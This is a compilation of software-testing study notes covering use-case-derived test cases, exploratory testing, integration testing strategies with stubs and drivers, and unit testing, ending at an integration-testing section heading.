What is Use Case Testing?

Use Case Testing is a functional black-box testing technique that helps testers identify test scenarios that exercise the whole system on a transaction-by-transaction basis from start to finish.

Characteristics of Use Case Testing:

• Use cases capture the interactions between 'actors' and the 'system'.
• 'Actors' represent users and the interactions each user takes part in.
• Test cases based on use cases are referred to as scenarios.
• Use case testing can identify gaps in the system that would not be found by testing individual components in isolation.
• It is very effective in defining the scope of acceptance tests.

Example:

The example below shows the interaction between users and possible actions.


Deriving test cases from use cases:

A four-step process:

1. Identify the use case scenarios

2. For each scenario, identify one or more test cases

3. For each test case, identify the conditions that will cause it to execute.

4. Complete the test case by adding data values


Generating Test Cases From Use Cases

Software testing often accounts for 30 to 50 percent of software development costs. This is because, first, testing software is very difficult, and second, testing is typically done without a clear methodology. It is best to start testing as early in the software development process as possible. Delaying the start of testing activities until all development is done is a high-risk approach. If significant bugs are found at this late stage (and they usually are), then schedules often slip. Haphazard methods of designing, organizing, and implementing testing activities also frequently lead to less-than-adequate test coverage.

So how do we use requirements (use cases) to generate test cases?

In software development, use cases define system software requirements. Use case development begins early on, so real use cases for key product functionality are available fairly early in the project. A use case fully describes a sequence of actions performed by a system to provide an observable result of value to a person or another system. Use cases tell the customer what to expect, the developer what to code, the technical writer what to document, and the tester what to test. For software testing, creation of test cases is the first step. Then test scripts (collections of test cases) are designed for these test cases, and finally, a test suite/plan is created to implement everything.

Test case (TC): A set of test inputs, executions, and expected results developed for a particular objective.

Test script/procedure: A document providing detailed instructions for the [manual] execution of one or more test cases.

Test suite: A collection of test scripts or test cases that is used for validating bug fixes (or finding new bugs) within a logical or physical area of a product.

Test cases are key to the process because they identify and communicate the conditions that will be implemented in test and are necessary to verify successful and acceptable implementation of the requirements. Although few actually do it, developers can begin creating test cases as soon as use cases are available, well before any code is written.


Use cases are part of the Unified Modeling Language (UML) and can be visually represented in use-case diagrams.

The ovals represent use cases, and the stick figures represent "actors," which can be either humans or other systems. The lines represent communication between an actor and a use case. As you can see, the use case diagram provides the big picture: each use case represents a big chunk of functionality that will be implemented, and each actor represents someone or something outside our system that interacts with it. Each use case also requires a significant amount of text to describe it. This text is usually formatted in the following sections:

Name: An appropriate name for the use case.

Brief Description: A brief description of the use case's role and purpose.

Flow of Events: A textual description of what the system does with regard to the use case (not how specific problems are solved by the system). The description should be understandable to the customer.

Special Requirements: A textual description that collects all requirements on the use case, such as non-functional requirements, that are not considered in the use-case model but need to be taken care of during design or implementation.

Preconditions: A textual description that defines any constraints on the system at the time the use case may start.

Post conditions: A textual description that defines any constraints on the system at the time the use case will terminate.

The most important part of a use case for generating test cases is the flow of events. The two main parts of the flow of events are the basic flow of events and the alternate flows of events. The basic flow of events should cover what "normally" happens when the use case is performed. The alternate flows of events cover behaviour of an optional or exceptional character relative to the normal behaviour, and also variations of the normal behaviour. You can think of the alternate flows of events as "detours" from the basic flow of events.


The straight arrow represents the basic flow of events, and the curves represent alternate flows. Note that some alternate flows return to the basic flow of events, while others end the use case. Both the basic flow of events and the alternative flows should be further structured into steps or subflows.

Register For Courses

Basic Flow

1. Logon. This use case starts when a Student accesses the University Web site. The system asks for, and the Student enters, the student ID and password.

2. Select 'Create a Schedule'. The system displays the functions available to the student. The student selects "Create a Schedule."

3. Obtain Course Information. The system retrieves a list of available course offerings from the Course Catalogue System and displays the list to the Student.

4. Select Courses. The Student selects four primary course offerings and two alternate course offerings from the list of available course offerings.

5. Submit Schedule. The student indicates that the schedule is complete. For each selected course offering on the schedule, the system verifies that the Student has the necessary prerequisites.

6. Display Completed Schedule. The system displays the schedule containing the selected course offerings for the Student and the confirmation number for the schedule.

Alternate Flows

1. Unidentified Student. In Step 1 of the Basic Flow, Logon, if the system determines that the student ID and/or password is not valid, an error message is displayed.

2. Quit. The Course Registration System allows the student to quit at any time during the use case. The Student may choose to save a partial schedule before quitting. All courses that are not marked as "enrolled in" are marked as "selected" in the schedule. The schedule is saved in the system. The use case ends.

3. Unfulfilled Prerequisites, Course Full, or Schedule Conflicts. In Step 5 of the Basic Flow, Submit Schedule, if the system determines that prerequisites for a selected course are not satisfied, that the course is full, or that there are schedule conflicts, the system will not enroll the student in the course. A message is displayed that the student can select a different course. The use case continues at Step 4, Select Courses, in the basic flow.

4. Course Catalog System Unavailable. In Step 3 of the Basic Flow, Obtain Course Information, if the system is down, a message is displayed and the use case ends.

5. Course Registration Closed. If, when the use case starts, it is determined that registration has been closed, a message is displayed, and the use case ends.

As you can see, a significant amount of detail goes into fully specifying a use case. Ideally, the flows should be written as "dialogs" between the system and the actors. Each step should explain what the actor does and what the system does in response; it should also be numbered and have a title. Alternate flows always specify where they start in the basic flow and where they go when they end.


Use-Case Scenarios

There is one more thing to describe before use cases can be used to generate test cases: a use-case scenario. A use-case scenario is an instance of a use case, or a complete "path" through the use case. End users of the completed system can go down many paths as they execute the functionality specified in the use case. Following the basic flow would be one scenario. Following the basic flow plus alternate flow 1 would be another. The basic flow plus alternate flow 2 would be a third, and so on. All possible scenarios for the diagram are listed below, beginning with the basic flow and then combining the basic flow with alternate flows.

Scenario 1: Basic Flow
Scenario 2: Basic Flow, Alternate 1
Scenario 3: Basic Flow, Alternate 1, Alternate 2
Scenario 4: Basic Flow, Alternate 3
Scenario 5: Basic Flow, Alternate 3, Alternate 1
Scenario 6: Basic Flow, Alternate 3, Alternate 1, Alternate 2
Scenario 7: Basic Flow, Alternate 4
Scenario 8: Basic Flow, Alternate 3, Alternate 4

These scenarios will be used as the basis for creating test cases.
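Since each scenario is simply a combination of the basic flow and alternate flows, the list above can be captured directly as data. A minimal Python sketch (the data structure is an illustrative assumption, not part of the original method):

# Illustrative sketch: use-case scenarios as combinations of flows.

scenarios = {
    "Scenario 1": ["Basic Flow"],
    "Scenario 2": ["Basic Flow", "Alternate 1"],
    "Scenario 3": ["Basic Flow", "Alternate 1", "Alternate 2"],
    "Scenario 4": ["Basic Flow", "Alternate 3"],
    "Scenario 5": ["Basic Flow", "Alternate 3", "Alternate 1"],
    "Scenario 6": ["Basic Flow", "Alternate 3", "Alternate 1", "Alternate 2"],
    "Scenario 7": ["Basic Flow", "Alternate 4"],
    "Scenario 8": ["Basic Flow", "Alternate 3", "Alternate 4"],
}

for name, flows in scenarios.items():
    print(name + ": " + " -> ".join(flows))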

Generating Test Cases

A test case is a set of test inputs, execution conditions, and expected results developed to verify compliance with a specific requirement. The purpose of a test case is to identify conditions that will be implemented in test. Test cases are necessary to verify successful and acceptable implementation of the requirements (use cases). There is a three-step process for generating test cases from a fully detailed use case:

1. For each use case, generate a full set of use-case scenarios.
2. For each scenario, identify at least one test case and the conditions that will make it "execute."
3. For each test case, identify the data values with which to test.

Step One: Generate Scenarios

Read the use-case textual description and identify each combination of main and alternate flows -- the scenarios -- and create a scenario matrix.

Scenario Name                                    Starting Flow   Alternate
Scenario 1 - Successful registration             Basic Flow
Scenario 2 - Unidentified student                Basic Flow      A1
Scenario 3 - User quits                          Basic Flow      A2
Scenario 4 - Course catalog system unavailable   Basic Flow      A4
Scenario 5 - Registration closed                 Basic Flow      A5
Scenario 6 - Cannot enroll                       Basic Flow      A3

Step Two: Identify Test Cases

Once the full set of scenarios has been identified, the next step is to identify the test cases. You do this by analyzing the scenarios and reviewing the use case textual description as well. There should be at least one test case for each scenario, but there will probably be more. For example, if the textual description for an alternate flow is written in a very cursory way, like "3A. Unfulfilled Prerequisites, Course Full, or Schedule Conflicts," then additional test cases may be required to test all the possibilities. In addition, we may wish to add test cases to test boundary conditions. The next step in fleshing out the test cases is to reread the use-case textual description and find the conditions or data elements required to execute the various scenarios. For the Register for Courses use case, conditions would be student ID, password, courses selected, etc.


Step Three: Identify Data Values to Test

Once all of the test cases have been identified, they should be reviewed and checked to ensure accuracy and to identify redundant or missing test cases. The next step is to identify the actual data values. Without test data, test cases (or test procedures) can't be implemented or executed; they are just descriptions of conditions, scenarios, and paths. Therefore, it is necessary to identify actual values to be used in implementing the final tests.
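To illustrate what the finished artifact might look like, here is a sketch of test-case records for three of the registration scenarios with concrete data values filled in; all specific values (IDs, passwords, courses) are invented for illustration:

# Illustrative test-case records for the Register for Courses use case.
# Every concrete value below is invented.

test_cases = [
    {"id": "RC1", "scenario": "Scenario 1 - Successful registration",
     "student_id": "jdoe42", "password": "valid-pw",
     "courses": ["MATH101", "CS201", "PHY110", "ENG105"],
     "expected": "schedule and confirmation number displayed"},
    {"id": "RC2", "scenario": "Scenario 2 - Unidentified student",
     "student_id": "jdoe42", "password": "wrong-pw",
     "courses": [],
     "expected": "error message displayed, logon re-displayed"},
    {"id": "RC3", "scenario": "Scenario 6 - Cannot enroll",
     "student_id": "jdoe42", "password": "valid-pw",
     "courses": ["CS401"],  # prerequisite CS201 not satisfied
     "expected": "message displayed, user returned to Select Courses"},
]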

Putting It All Together

Generally, use cases are associated with the front end of the software development lifecycle and test cases are typically associated with the latter part of the lifecycle. By using use cases to generate test cases, testing teams can get started much earlier in the lifecycle, allowing them to identify and repair defects that would be very costly to fix later, ship on time, and ensure that the system will work reliably.


Exploratory testing

• As its name implies, exploratory testing is about exploring, finding out about the software, what it does, what it doesn’t do, what works and what doesn’t work. The tester is constantly making decisions about what to test next and where to spend the (limited) time. This is an approach that is most useful when there are no or poor specifications and when time is severely limited.

• Exploratory testing is a hands-on approach in which testers are involved in minimum planning and maximum test execution.

• The planning involves the creation of a test charter, a short declaration of the scope of a short (1 to 2 hour) time-boxed test effort, the objectives and possible approaches to be used.

• The test design and test execution activities are performed in parallel, typically without formally documenting the test conditions, test cases or test scripts. This does not mean that other, more formal testing techniques will not be used. For example, the tester may decide to use boundary value analysis but will think through and test the most important boundary values without necessarily writing them down. Some notes will be written during the exploratory-testing session, so that a report can be produced afterwards.

• Test logging is undertaken as test execution is performed, documenting the key aspects of what is tested, any defects found and any thoughts about possible further testing.

• It can also serve to complement other, more formal testing, helping to establish greater confidence in the software. In this way, exploratory testing can be used as a check on the formal test process by helping to ensure that the most serious defects have been found.

Exploratory testing definition

“Exploratory Testing is a testing approach that allows you to apply your ability and skill as a tester in a powerful way.” Testers first have to understand the application by exploring it; based on that understanding they come up with test scenarios, and only then does actual testing of the application start.

Exploratory testing is simultaneous learning, test design, and test execution.


Key tips to remember in Exploratory testing techniques:

• Prepare test scenarios that validate the software's stability.
• Test the software exhaustively based on the identified requirements.
• Find out the requirements as well as the functionality of the software application.
• Find out the limitations of the software application.
• Identify the scope of the project.

In this type of testing, testers put minimum effort into planning and maximum into execution, so that they learn the exact functionality of the application; this helps the tester decide what to test next. During testing the tester learns about the behavior of the software application and starts creating a test plan or test scenarios. There are various exploratory testing tools on the market; one of them, "Session Tester", can be used for managing and recording session-based testing. The creation of test scenarios is based entirely on the tester's experience with, and learning of, the application under test.

In this type of testing the tester has freedom in how to test. Finding bugs depends not only on the experience of the tester but also on the tester's skill.

Testers often wonder when this type of testing comes into the picture, so here are situations in which exploratory testing can be used:

• When you don't have requirements or testing documents, or have only minimal documents.
• When you want to complete your application testing in a short period of time.
• When you have to test the application in an early stage of the SDLC.

Usage

Exploratory testing is particularly suitable if requirements and specifications are incomplete, or if there is lack of time. The approach can also be used to verify that previous testing has found the most important defects.


What is Exploratory Testing?

When there is severe time pressure during the testing phase, the exploratory testing technique is adopted; it combines the experience of testers with a structured approach to testing.

Exploratory testing is often performed as a black-box testing technique: the tester learns things that, together with experience and creativity, generate good new tests to run.

As the name suggests, exploratory testing is about exploring the software and finding out more about it.

In exploratory testing the tester focuses on how the software actually works: minimum planning and maximum execution give an in-depth idea of the software's functionality, and once the tester starts gaining insight into the software, he or she can decide what to test next.

As per Cem Kaner, exploratory testing is “a style of software testing that emphasizes the personal freedom and responsibility of the individual tester to continually optimize the quality of his/her work by treating test-related learning, test design, test execution, and test result interpretation as mutually supportive activities that run in parallel throughout the project.”

Exploratory Testing is mostly performed by skilled testers.

Exploratory testing is mostly used when the requirements are incomplete and the time to release the software is short.

Exploratory testing:

• Is not random testing; it is ad hoc testing with the purpose of finding bugs.
• Is structured and rigorous.
• Is cognitively structured, as compared with the procedural structure of scripted testing; this structure comes from the charter, time-boxing, etc.
• Is highly teachable and manageable.
• Is not a technique but an approach: what actions you perform next is governed by what you are doing currently.

Exploratory Test Preparation:

Exploratory test preparation goes through the following five stages, detailed below; this is also called session-based test management (the SBTM cycle):

1. Create a bug taxonomy (classification)
o Categorize common types of faults found in past projects.
o Analyze the root causes of the problems or faults.
o Find the risks and develop ideas to test the application.

2. Test charter
o The test charter should suggest (1) what to test, (2) how it can be tested, and (3) what needs to be looked at.
o Test ideas are the starting point of exploratory testing.
o The test charter helps determine how the end user could use the system.

3. Time box
o This method has a pair of testers working together for not less than 90 minutes.
o There should be no interruptions in that 90-minute session.
o The time box can be extended or reduced by 45 minutes.
o The session encourages testers to react to the response from the system and prepare for the correct outcome.

4. Review results
o Evaluation of the defects.
o Learning from the testing.
o Analysis of the coverage areas.

5. Debriefing
o Compilation of the output results.
o Comparison of the results with the charter.
o Checking whether any additional testing is needed.

During exploratory execution, the following needs to be done:

• The mission of the testing should be very clear.
• Keep notes on what needs to be tested, why it needs to be tested, and the assessment of the product quality.
• Track questions and issues raised during exploratory testing.
• It is better to pair up testers for effective testing.
• The more we test, the more likely we are to execute the right test cases for the required scenarios.

It is very important to document and monitor the following:

• Test coverage - whether we have taken notes on the coverage of test cases and improved the quality of the software.
• Risks - which risks need to be covered, and which are the most important ones?
• Test execution log - recordings of the test execution.
• Issues/queries - notes on the questions and issues raised about the system.

Smarter exploratory testing finds more errors in less time.

Advantages

• It requires little preparation, since there are no test documents to write in advance.
• Time is saved because all tasks - testing, designing test scenarios, and executing test scenarios - are done simultaneously.
• The tester can report many issues caused by incomplete or missing requirements documents.

Disadvantages

• A few kinds of issues cannot be caught by this type of testing.
• Test planning and test case/scenario design are reviewed only while testing is in progress, which may cause issues.
• Testers have to remember the scenario they are executing, because if a bug is found the tester should report it with proper steps to reproduce.
• It is difficult to repeat a test in exactly the same manner, especially for newly found bugs.

Benefits:

Following are the benefits of Exploratory Testing:

• Exploratory testing takes less preparation.
• Critical defects are found very quickly.
• Testers can use a reasoning-based approach, building on previous results to guide their further testing on the fly.

Drawbacks:

Following are the Drawbacks of Exploratory Testing:

• Tests cannot be reviewed in advance.
• It is difficult to keep track of what has been tested.
• Tests are unlikely to be performed in exactly the same manner a second time, so specific details of earlier tests are hard to repeat.

Challenges of Exploratory Testing:

There are many challenges of exploratory testing and those are explained below:

• Learning to use the application or software system is a challenge.
• Replication of failures is difficult.
• Determining whether tools need to be used can be challenging.
• Determining the best test cases to execute can be difficult.
• Reporting the test results is a challenge, as the report has no planned scripts or cases to compare with the actual results or outcomes.
• Documenting all events during execution is difficult.
• It is hard to know when to stop testing, as exploratory testing has no definite set of test cases to execute.

When to use exploratory testing?

Exploratory testing can be used extensively when

• The testing team has experienced testers.
• Early iteration is required.
• The application is critical.
• New testers have entered the team.


Integration testing

DEFINITION

Integration Testing is a level of the software testing process where individual units are combined and tested as a group.

The purpose of this level of testing is to expose faults in the interaction between integrated units.

Test drivers and test stubs are used to assist in Integration Testing.

Note: The definition of a unit is debatable and it could mean any of the following:

1. the smallest testable part of a software system
2. a 'module', which could consist of many of '1'
3. a 'component', which could consist of many of '2'

Need of Integration Testing:

Although each software module is unit tested, defects still exist for various reasons like

• A module, in general, is designed by an individual software developer whose understanding and programming logic may differ from that of other programmers. Integration testing becomes necessary to verify that the software modules work in unity.

• At the time of module development, there is a wide chance of the clients changing the requirements. These new requirements may not be unit tested, and hence integration testing becomes necessary.

• Interfaces of the software modules with the database could be erroneous.
• External hardware interfaces, if any, could be erroneous.
• Inadequate exception handling could cause issues.

TASKS

• Integration Test Plan: prepare, review, rework, baseline
• Integration Test Cases/Scripts: prepare, review, rework, baseline
• Integration Test: perform

When is Integration Testing performed?

Integration Testing is performed after Unit Testing and before System Testing.

Who performs Integration Testing?

Either Developers themselves or independent Testers perform Integration Testing.

Definition by ISTQB

• integration testing: Testing performed to expose defects in the interfaces and in the interactions between integrated components or systems. See also component integration testing, system integration testing.

• component integration testing: Testing performed to expose defects in the interfaces and interaction between integrated components.

• system integration testing: Testing the integration of systems and packages; testing interfaces to external organizations (e.g. Electronic Data Interchange, Internet).


• Integration testing tests the integration or interfaces between components; interactions with different parts of the system, such as the operating system, file system and hardware; and interfaces between systems.

• Integration testing is also done after two different components have been integrated together. As displayed in the image below, when two different modules 'Module A' and 'Module B' are integrated, integration testing is performed.

• Integration testing is done by a specific integration tester or test team.
• Integration testing commonly follows two approaches, known as the 'Top Down' approach and the 'Bottom Up' approach, as shown in the image below:

APPROACHES

• Big Bang is an approach to Integration Testing where all or most of the units are combined together and tested at one go. This approach is taken when the testing team receives the entire software in a bundle. So what is the difference between Big Bang Integration Testing and System Testing? Well, the former tests only the interactions between the units while the latter tests the entire system.

• Top Down is an approach to Integration Testing where top level units are tested first and lower level units are tested step by step after that. This approach is taken when top down development approach is followed. Test Stubs are needed to simulate lower level units which may not be available during the initial phases.

• Bottom Up is an approach to Integration Testing where bottom level units are tested first and upper level units step by step after that. This approach is taken when bottom up development approach is followed. Test Drivers are needed to simulate higher level units which may not be available during the initial phases.

• Sandwich/Hybrid is an approach to Integration Testing which is a combination of Top Down and Bottom Up approaches.


Below are the integration testing techniques:

1. Big Bang integration testing:

In Big Bang integration testing, all components or modules are integrated simultaneously, after which everything is tested as a whole. As per the image below, all the modules from 'Module 1' to 'Module 6' are integrated simultaneously, and then the testing is carried out.

Big Bang Integration Testing is an integration testing strategy wherein all units are linked at once, resulting in a complete system. When this type of testing strategy is adopted, it is difficult to isolate any errors found, because attention is not paid to verifying the interfaces across individual units.

Big Bang Integration - WorkFlow Diagram

Big Bang Testing is represented by the following workflow diagram:


Advantage: Big Bang testing has the advantage that everything is finished before integration testing starts.

• Convenient for small systems.

Disadvantage: The major disadvantage is that in general it is time consuming and difficult to trace the cause of failures because of this late integration.

• Defects present at the interfaces of components are identified at a very late stage, as all components are integrated in one shot.
• It is very difficult to isolate the defects found.
• There is a high probability of missing some critical defects, which might pop up in the production environment.
• It is very difficult to cover all the cases for integration testing without missing even a single scenario.
• Fault localization is difficult.
• Given the sheer number of interfaces that need to be tested in this approach, some interface links to be tested could easily be missed.
• Since integration testing can commence only after "all" the modules are designed, the testing team will have less time for execution in the testing phase.
• Since all modules are tested at once, high-risk critical modules are not isolated and tested on priority. Peripheral modules which deal with user interfaces are also not isolated and tested on priority.


Incremental Approach:

In this approach, testing is done by joining two or more modules that are logically related. Then the other related modules are added and tested for proper functioning. The process continues until all of the modules are joined and tested successfully.

This process is carried out by using dummy programs called Stubs and Drivers. Stubs and Drivers do not implement the entire programming logic of the software module but just simulate data communication with the calling module.

Stub: Is called by the Module under Test.

Driver: Calls the Module to be tested.

The Incremental Approach, in turn, is carried out by two different methods, illustrated by the code sketch after this list:

• Bottom Up
• Top Down
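Here is a minimal Python sketch of the stub/driver distinction; all module names and behavior are invented for illustration. The driver exercises the module under test from above, while the stub stands in for an unfinished lower-level module (in real top-down testing the stub would replace the actual module, for example by injection):

# Illustrative sketch of a stub and a driver around a module under test.

def fetch_tax_rate(region):
    # Stub: replaces an unfinished lower-level module with canned data.
    return 0.10

def compute_invoice_total(amount, region):
    # Module under test: calls the (stubbed) lower-level module.
    return amount + amount * fetch_tax_rate(region)

def driver():
    # Driver: a throwaway "main program" that feeds test data in
    # and prints the results.
    for amount, region, expected in [(100.0, "north", 110.0),
                                     (0.0, "south", 0.0)]:
        result = compute_invoice_total(amount, region)
        print(f"amount={amount} region={region} -> {result} "
              f"(expected {expected})")

if __name__ == "__main__":
    driver()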

2. Top-down integration testing: Testing takes place from top to bottom, following the control flow or architectural structure (e.g. starting from the GUI or main menu). Components or systems are substituted by stubs. Below is the diagram of ‘Top down Approach’:

Top-down integration testing is an integration testing technique used in order to simulate the behavior of the lower-level modules that are not yet integrated. Stubs are the modules that act as temporary replacement for a called module and give the same output as that of the actual product.


Stub - Flow Diagram:

The above diagram clearly shows that Modules 1, 2 and 3 are available for integration, whereas the lower-level modules are still under development and cannot be integrated at this point in time. Hence, stubs are used to test the modules. The order of integration will be:

1, 2
1, 3
2, Stub 1
2, Stub 2
3, Stub 3
3, Stub 4

First, test the integration between modules 1, 2 and 3; then test the integration between module 2 and Stub 1 / Stub 2; then test the integration between module 3 and Stub 3 / Stub 4.

The replacement for the 'called' modules is known as 'Stubs' and is also used when the software needs to interact with an external system.

Advantages of Top-Down approach:

• The tested product is very consistent, because the integration testing is basically performed in an environment that is close to reality.
• Stubs can be written in less time because, compared with drivers, stubs are simpler to author.
• Fault localization is easier.
• It is possible to obtain an early prototype.
• Critical modules are tested on priority; major design flaws can be found and fixed first.

Disadvantages of Top-Down approach:

• Basic functionality is tested at the end of the cycle.
• It needs many stubs.
• Modules at the lower levels are tested inadequately.

3. Bottom-up integration testing: Testing takes place from the bottom of the control flow upwards. Components or systems are substituted by drivers. Below is the image of ‘Bottom up approach’:

Advantage of Bottom-Up approach:

• In this approach development and testing can be done together so that the product or application will be efficient and as per the customer specifications.

• Fault localization is easier.
• Unlike the big bang approach, no time is wasted waiting for all modules to be developed.

Disadvantages of Bottom-Up approach:

• Key interface defects are caught only at the end of the cycle.
• Test drivers must be created for modules at all levels except the top control level.
• Critical modules (at the top level of the software architecture) which control the flow of the application are tested last and may be prone to defects.
• An early prototype is not possible.


4. Hybrid Approach: To overcome the limitations, and to exploit the advantages, of the Top-down and Bottom-up approaches, a hybrid approach is used. As the name suggests, it is a mixture of the two approaches, Top Down as well as Bottom Up. In this approach the system is viewed as three layers: the main target layer in the middle, another layer above the target layer, and the last layer below the target layer.

The Top-Down approach is used in the topmost layer and the Bottom-Up approach is used in the lowermost layer. The lowermost layer contains many general-purpose utility programs, which are helpful in verifying correctness at the beginning of testing. The middle-level target layers, toward which testing converges, are selected on the basis of system characteristics and the structure of the code; the middle-level target layer contains components that use the utilities.

Final decision on selecting an integration approach depends on system characteristics as well as on customer expectations. Sometimes the customer wants to see a working version of the application as soon as possible thereby forcing an integration approach aimed at producing a basic working system in the earlier stages of the testing process.

Integration Testing Procedure

The integration test procedure, irrespective of the test strategy (discussed above), is:

1. Prepare the integration test plan.
2. Design the test scenarios, cases, and scripts.
3. Execute the test cases, followed by reporting the defects.
4. Track and re-test the defects.
5. Repeat steps 3 and 4 until integration is completed successfully.

Brief Description of Integration Test Plans:

It includes the following attributes:

• Methods/approaches to testing (as discussed above).
• In-scope and out-of-scope items of integration testing.
• Roles and responsibilities.
• Prerequisites for integration testing.
• Testing environment.
• Risk and mitigation plans.
• Entry and exit criteria.

The entry and exit criteria for the integration testing phase, in any software development model, are as follows.


Entry Criteria:

• Components/modules have been unit tested.
• All high-priority bugs are fixed and closed.
• All modules are code-complete and integrated successfully.
• The integration test plan, test cases and scenarios are signed off and documented.
• The required test environment is set up for integration testing.

Exit Criteria:

• The integrated application has been tested successfully.
• Executed test cases are documented.
• All high-priority bugs are fixed and closed.
• Technical documents are submitted, followed by release notes.

Best Practices/ Guidelines for Integration Testing

• First determine the Integration Test Strategy that could be adopted and later prepare the test cases and test data accordingly.

• Study the Architecture design of the Application and identify the Critical Modules. These need to be tested on priority.

• Obtain the interface designs from the architecture team and create test cases to verify all of the interfaces in detail. Interfaces to databases and to external hardware or software applications must be tested in detail.

• After the test cases, it is the test data that plays the critical role.
• Always have the mock data prepared prior to execution; do not select test data while executing the test cases.

How to write an Integration Test Case?

Simply put, a Test Case describes exactly how the test should be carried out. The Integration test cases specifically focus on the flow of data/information/control from one component to the other.

So the Integration Test cases should typically focus on scenarios where one component is being called from another. Also the overall application functionality should be tested to make sure the app works when the different components are brought together.

The various integration test cases, clubbed together, form an integration test suite. Each suite may have a particular focus; in other words, different test suites may be created to focus on different areas of the application.

As mentioned before a dedicated Testing Team may be created to execute the Integration test cases. Therefore the Integration Test Cases should be as detailed as possible.
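As an illustration of such a test case, the following sketch verifies the hand-off between two components; the component functions and data are invented, and Python's unittest is used only as a convenient harness:

# Illustrative integration test: verifies the data hand-off between an
# order component and a billing component. All names are invented.

import unittest

def create_order(items):
    # Component A: builds an order from (name, price) pairs.
    return {"items": items, "total": sum(price for _, price in items)}

def bill(order):
    # Component B: consumes component A's output.
    if order["total"] <= 0:
        raise ValueError("nothing to bill")
    return "invoice for {:.2f}".format(order["total"])

class OrderBillingIntegrationTest(unittest.TestCase):
    def test_order_flows_into_billing(self):
        order = create_order([("book", 12.50), ("pen", 2.50)])
        self.assertEqual(bill(order), "invoice for 15.00")

    def test_empty_order_is_rejected_by_billing(self):
        with self.assertRaises(ValueError):
            bill(create_order([]))

if __name__ == "__main__":
    unittest.main()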


17.3.1 Unit Testing

Unit testing focuses verification effort on the smallest unit of software design—the software component or module. Using the component-level design description as a guide, important control paths are tested to uncover errors within the boundary of the module. The relative complexity of tests and the errors those tests uncover is limited by the constrained scope established for unit testing. The unit test focuses on the internal processing logic and data structures within the boundaries of a component. This type of testing can be conducted in parallel for multiple components.

(Footnote: Throughout this book, the terms conventional software or traditional software refer to common hierarchical or call-and-return software architectures that are frequently encountered in a variety of application domains. Traditional software architectures are not object-oriented and do not encompass WebApps.)

Unit-test considerations. Unit tests are illustrated schematically in Figure 17.3. The module interface is tested to ensure that information properly flows into and out of the program unit under test. Local data structures are examined to ensure that data stored temporarily maintains its integrity during all steps in an algorithm's execution. All independent paths through the control structure are exercised to ensure that all statements in a module have been executed at least once. Boundary conditions are tested to ensure that the module operates properly at boundaries established to limit or restrict processing. And finally, all error-handling paths are tested.

Data flow across a component interface is tested before any other testing is initiated. If data do not enter and exit properly, all other tests are moot. In addition, local data structures should be exercised and the local impact on global data should be ascertained (if possible) during unit testing.

Selective testing of execution paths is an essential task during the unit test. Test cases should be designed to uncover errors due to erroneous computations, incorrect comparisons, or improper control flow.

Boundary testing is one of the most important unit testing tasks. Software often fails at its boundaries. That is, errors often occur when the nth element of an n-dimensional array is processed, when the ith repetition of a loop with i passes is invoked, or when the maximum or minimum allowable value is encountered. Test cases that exercise data structure, control flow, and data values just below, at, and just above maxima and minima are very likely to uncover errors.
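For instance, a boundary-focused unit test probes values just below, at, and just above a routine's limits. A minimal sketch using Python's unittest (the routine find_max is invented for illustration):

# Boundary-condition unit tests for an invented routine find_max.

import unittest

def find_max(values):
    if not values:
        raise ValueError("empty input")
    return max(values)

class FindMaxBoundaryTest(unittest.TestCase):
    def test_empty_list_is_rejected(self):
        # Just below the minimum allowable size.
        with self.assertRaises(ValueError):
            find_max([])

    def test_single_element(self):
        # At the minimum allowable size.
        self.assertEqual(find_max([7]), 7)

    def test_max_at_last_position(self):
        # The nth element of an n-element structure.
        self.assertEqual(find_max([1, 2, 9]), 9)

if __name__ == "__main__":
    unittest.main()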

[Figure 17.3: Unit test. Test cases are directed at the module interface, local data structures, boundary conditions, independent paths, and error-handling paths.]

Note: It's not a bad idea to design unit test cases before you develop code for a component. It helps ensure that you'll develop code that will pass the tests.

Page 504: CP 7026 - Software Quality Assurance

A good design anticipates error conditions and establishes error-handling paths to reroute or cleanly terminate processing when an error does occur. Yourdon [You75] calls this approach antibugging. Unfortunately, there is a tendency to incorporate error handling into software and then never test it. A true story may serve to illustrate:

A computer-aided design system was developed under contract. In one transaction processing module, a practical joker placed the following error handling message after a series of conditional tests that invoked various control flow branches: ERROR! THERE IS NO WAY YOU CAN GET HERE. This “error message” was uncovered by a customer during user training!

Among the potential errors that should be tested when error handling is evaluated are: (1) error description is unintelligible, (2) error noted does not correspond to error encountered, (3) error condition causes system intervention prior to error handling, (4) exception-condition processing is incorrect, or (5) error description does not provide enough information to assist in the location of the cause of the error.
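Points (1) and (5) in this list lend themselves to mechanical checking. A small sketch that exercises an error-handling path and asserts that the reported message is specific enough to locate the cause (the function and message are invented):

# Illustrative check that an error path yields an intelligible,
# specific message. All names are invented.

import unittest

def open_config(path):
    if not path.endswith(".cfg"):
        raise ValueError(
            "config file '%s' must have a .cfg extension" % path)
    return {"path": path}

class ErrorPathTest(unittest.TestCase):
    def test_error_message_names_the_offending_input(self):
        with self.assertRaises(ValueError) as ctx:
            open_config("settings.txt")
        # (5): the message should help locate the cause of the error.
        self.assertIn("settings.txt", str(ctx.exception))

if __name__ == "__main__":
    unittest.main()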

Unit-test procedures. Unit testing is normally considered as an adjunct to the coding step. The design of unit tests can occur before coding begins or after source code has been generated. A review of design information provides guidance for establishing test cases that are likely to uncover errors in each of the categories discussed earlier. Each test case should be coupled with a set of expected results.

Because a component is not a stand-alone program, driver and/or stub software must often be developed for each unit test. The unit test environment is illustrated in Figure 17.4. In most applications a driver is nothing more than a “main program” that accepts test case data, passes such data to the component (to be tested), and prints relevant results. Stubs serve to replace modules that are subordinate to (invoked by) the component to be tested. A stub or “dummy subprogram” uses the subordinate module's interface, may do minimal data manipulation, prints verification of entry, and returns control to the module undergoing testing.

[Figure 17.4: Unit-test environment. A driver passes test cases to the module to be tested; stubs stand in for the module's subordinates; results are returned to the driver.]

WebRef: Useful information on a wide variety of articles and resources for “agile testing” can be found at testing.com/agile/.

Note: Be sure that you design tests to execute every error-handling path. If you don't, the path may fail when it is invoked, exacerbating an already dicey situation.

Drivers and stubs represent testing “overhead.” That is, both are software that must be written (formal design is not commonly applied) but that is not delivered with the final software product. If drivers and stubs are kept simple, actual overhead is relatively low. Unfortunately, many components cannot be adequately unit tested with “simple” overhead software. In such cases, complete testing can be postponed until the integration test step (where drivers or stubs are also used).

Unit testing is simplified when a component with high cohesion is designed. When only one function is addressed by a component, the number of test cases is reduced and errors can be more easily predicted and uncovered.

17.3.2 Integration Testing

